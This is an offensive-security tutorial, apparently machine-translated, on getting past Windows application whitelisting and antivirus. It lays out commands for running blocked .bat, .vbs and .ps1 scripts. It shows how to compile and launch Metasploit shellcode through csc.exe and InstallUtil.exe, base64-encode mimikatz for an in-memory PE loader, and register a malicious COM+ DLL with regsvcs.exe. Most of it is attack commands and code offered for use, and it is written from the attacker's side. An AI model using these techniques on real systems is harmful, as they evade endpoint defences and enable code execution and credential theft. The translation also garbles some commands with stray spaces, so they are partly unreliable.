Bypass Protection Using whitelist applications

Bypass Protection Using whitelist applications

0x01 Script Execution

In some cases, for example, if the. bat |. vbs |. ps1 script is restricted, we can bypass the following methods:
. Bat cmd.exe/k
. Vbs cscript.exe // E: vbscript script.txt
. Ps1 Get-Content script.txt | iex




During the test, please pay attention to encoding. If you manually write "net user" to a new file to test the file, you will find that the file fails, so use echo.


0x01 use installutil.exe to execute the program

In some cases, attackers cannot execute exe files on the website, or the anti-virus software is too powerful. This method bypasses the detection. Of course, the environment must be. net4.0 or above.

1. directly use msf to generate shellcode and execute shellcode
Step One:
C: \ Windows \ Microsoft. NET \ Framework64 \ v4.0.30319 \ csc.exe/unsafe/platform: x64/out: exeshell.exe Shellcode. cs
Step Two:
C: \ Windows \ Microsoft. NET \ Framework64 \ v4.0.30319 \ InstallUtil.exe/logfile =/LogToConsole = false/U exeshell.exe

Of course, if you want to do it locally first, and then upload the server for execution in the second part.


2. directly execute the pe file (execute mimikatz)

For a pe file, you must first encode the pe file with base64. There are two methods:

* Base64 Encode Mimikatz In PowerShell-$fileName = "mimikatz.exe"$fileContent = get-content $fileName$fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent)$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)$fileContentEncoded | set-content ($fileName + ".b64")* [OR]byte[] AsBytes = File.ReadAllBytes(@"C:\Tools\Mimikatz.exe");String AsBase64String = Convert.ToBase64String(AsBytes);StreamWriter sw = new StreamWriter(@"C:\Tools\Mimikatz.b64");sw.Write(AsBase64String);sw.Close();

Use the same as above:
C: \ Windows \ Microsoft. NET \ Framework64 \ v4.0.30319 \ csc.exe/unsafe/out: PELoader.exe PELoader. cs
C: \ Windows \ Microsoft. NET \ Framework64 \ v4.0.30319 \ InstallUtil.exe/logfile =/LogToConsole = false/U PELoader.exe


0x02 use COM + application

Write our malicious shellcode into the COM + application

1: [. net sdk] sn.exe key. snk

2: C: \ Windows \ Microsoft. NET \ Framework \ v4.0.30319 \ csc.exe/r: System. enterpriseServices. dll/keyfile: key. snk/target: library/out: dllguest. dll dllguest. cs

3: [As Administrator] C: \ Windows \ Microsoft. NET \ Framework \ v4.0.30319 \ regsvcs.exe dllguest. dll

4: [From PowerShell] $ B = New-Object-ComObject dllguest. bypass
OR
[From VBScript] Dim obj Set obj = CreateObject ("dllguest. Bypass ")

Use the original demo:


Although the demo was not perfect, there were a lot of errors during the test, but it already showed the author's goal of "using the White List Application to execute malicious code.